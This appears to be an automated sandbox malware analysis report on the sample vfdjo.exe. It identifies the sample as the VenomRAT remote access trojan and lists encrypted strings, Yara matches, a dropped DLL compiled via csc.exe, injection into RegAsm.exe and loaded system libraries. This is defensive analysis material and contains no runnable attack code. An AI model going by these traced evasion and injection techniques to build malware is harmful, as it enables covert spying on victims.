Source: vfdjo.exe, Knvbl.cs	Base64 encoded string: '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
Source: 0.2.vfdjo.exe.50d0000.8.raw.unpack, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
Source: lvbdqmie.dll.1.dr, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/9@0/2

Source: C:\Users\user\Desktop\vfdjo.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vfdjo.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\FkwbxYcgg1G0FnF/TAjQzi9jUa9qcKKioTum8hnjwFlv/+1VfkEHx8BfkllXkWd9Y+CD9XIOkxhhblHpQPtD1w==

Source: C:\Users\user\Desktop\vfdjo.exe

File created: C:\Users\user\AppData\Local\Temp\lvbdqmie

Jump to behavior

Source: vfdjo.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: vfdjo.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Users\user\Desktop\vfdjo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vfdjo.exe	ReversingLabs: Detection: 60%
Source: vfdjo.exe	Virustotal: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\vfdjo.exe "C:\Users\user\Desktop\vfdjo.exe"
Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD93C.tmp" "c:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP"
Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD93C.tmp" "c:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mmdevapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\vfdjo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: vfdjo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: vfdjo.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: vfdjo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Source: vfdjo.exe

Static PE information: 0xC7BC387B [Mon Mar 9 17:40:11 2076 UTC]

Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline"
Source: C:\Users\user\Desktop\vfdjo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_06A01E30 push es; ret

4_2_06A01E40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll

Jump to dropped file

Boot Survival

Yara detected VenomRAT

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vfdjo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
